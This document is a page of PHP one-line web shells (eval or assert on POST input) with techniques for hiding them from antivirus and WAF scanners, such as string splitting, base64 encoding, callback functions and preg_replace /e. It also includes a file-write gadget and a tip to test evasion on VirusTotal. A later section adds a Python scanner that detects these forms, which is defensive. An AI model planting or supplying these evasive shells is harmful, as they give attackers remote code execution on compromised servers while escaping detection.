1. Dynamic AV/WAF evasion (assert, eval)

<?php eval($_POST['haha']); ?>
<?php assert($_POST['haha']); ?>

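Hiding the keywords (when a WAF sees the keywords assert or eval, the file is very likely to be flagged, so the keyword can instead be generated from other strings. There are many ways to generate it; a few common forms are listed here, and in practice they all have much the same effect.)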

-1 Split and concatenate

<?php $a = "a"."s"; $b = "e"."r"."t"; $c = $a.$b; $c($_POST['haha']); ?>
<?php function fun1($a) { $a($_POST['haha']); } fun1(assert); ?>
<?php function fun1($a) { assert($a); } fun1($_POST['haha']); ?>
<?php class me { public $a = ''; function __destruct() { assert("$this->a"); } } $obj = new me; $obj->a = $_POST['haha']; ?>

-2 Function calls (using functions such as array_map, array_key, preg_replace, @call_user_func and substr_replace to hide the keyword)

<?php @call_user_func(assert,$_POST['haha']); ?>
<?php $a = substr_replace("assexx","rt",4); $a($_POST['haha']); ?>
<?php $a = $_REQUEST['haha']; $b = "\n"; ?>
<?php function fun() { return $_POST['haha']; } @preg_replace("/nihao/e",fun(),"nihao woshi zj"); ?>
<?php if(isset($_POST['file'])) { $d = 'data'; $$d = $_POST['haha']; /* $data */ $f = 'fp'; $$f = fopen($_POST['file'],'wb'); /* $fp */ echo fwrite($fp,$data)?'save success':'save fail'; fclose($fp); } ?>

-3 Encoding

<?php $a = base64_decode("YXNzZXJ0"); $a($_POST['haha']); ?>

-4 Obscure callback functions: using array_uintersect_uassoc to call back assert

<?php $password = "LandGrey"; array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); ?>

Test with https://www.virustotal.com/
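Seen from the detection side, every form above still has to resolve to assert or eval and be handed request data, so a scanner that normalises the source before matching catches what a plain keyword search misses. The following Python scanner is an added example, not part of the original page: it folds literal concatenation, base64_decode of a literal and simple variable assignments, then applies per-statement rules. The function names, rule names and sample files are assumptions constructed for illustration.

```python
import base64
import re

SINKS = r'(?:assert|eval)'                   # the two keywords this page hides
INPUT = r'\$_(?:POST|GET|REQUEST|COOKIE)\b'  # request-controlled superglobals
STR = r'''(?:"([^"\\$]*)"|'([^'\\]*)')'''    # simple string literal, no escapes
RULES = {  # name: (statement must also contain request input?, pattern)
    "hidden-sink-call": (False, r'''["']''' + SINKS + r'''["']\s*\('''),
    "sink-on-input": (True, r'\b' + SINKS + r'\s*\('),
    "sink-as-callback": (True, r'''[(,]\s*["']?''' + SINKS + r'''["']?\s*[,)]'''),
    "variable-function-on-input": (True, r'\$(?!_)\w+\s*\('),
    "preg-replace-e": (False, r'''preg_replace\s*\(\s*["']/[^"']*/\w*e\w*["']'''),
}

def fold_literals(src):
    """Resolve base64_decode("<literal>") and "a"."b" literal concatenation."""
    def b64(m):
        try:
            return '"%s"' % base64.b64decode(m.group(1) or m.group(2) or "").decode("ascii")
        except ValueError:                   # not base64 or not ASCII: leave untouched
            return m.group(0)
    src = re.sub(r'base64_decode\s*\(\s*' + STR + r'\s*\)', b64, src)
    concat = re.compile(STR + r'\s*\.\s*' + STR)
    while concat.search(src):                # each pass merges adjacent literal pairs
        src = concat.sub(lambda m: '"%s"' % "".join(g or "" for g in m.groups()), src)
    return src

def propagate(src):
    """Inline variables assigned a plain string literal, re-folding after each pass."""
    assign = re.compile(r'(\$\w+)\s*=\s*' + STR + r'\s*;')
    for _ in range(8):                       # bounded number of passes
        src = fold_literals(src)
        for var, dq, sq in assign.findall(src):
            use = re.escape(var) + r'\b(?!\s*=(?!=))'   # uses, not the assignment
            src = re.sub(use, lambda m, v=dq or sq: '"%s"' % v, src)
    return fold_literals(src)

def scan(src):
    """Return the names of the rules that fire on the normalised source."""
    return {name for stmt in propagate(src).split(";")
            for name, (needs_input, rx) in RULES.items()
            if re.search(rx, stmt) and (not needs_input or re.search(INPUT, stmt))}

SAMPLES = {  # constructed one-line samples in the styles listed above, plus a control
    "concat.php": '<?php $a = "as"."s"; $b = "e"."rt"; $c = $a.$b; $c($_POST["x"]); ?>',
    "b64.php": '<?php $a = base64_decode("YXNzZXJ0"); $a($_POST["x"]); ?>',
    "callback.php": '<?php array_udiff_assoc(array($_REQUEST["p"]), array(1), "assert"); ?>',
    "benign.php": '<?php $name = "as"."set"; echo htmlspecialchars($_POST["q"]); ?>',
}
```

A file flagged only as variable-function-on-input is one whose callee could not be resolved statically (the substr_replace form, for example) and is a candidate for manual review rather than an automatic verdict.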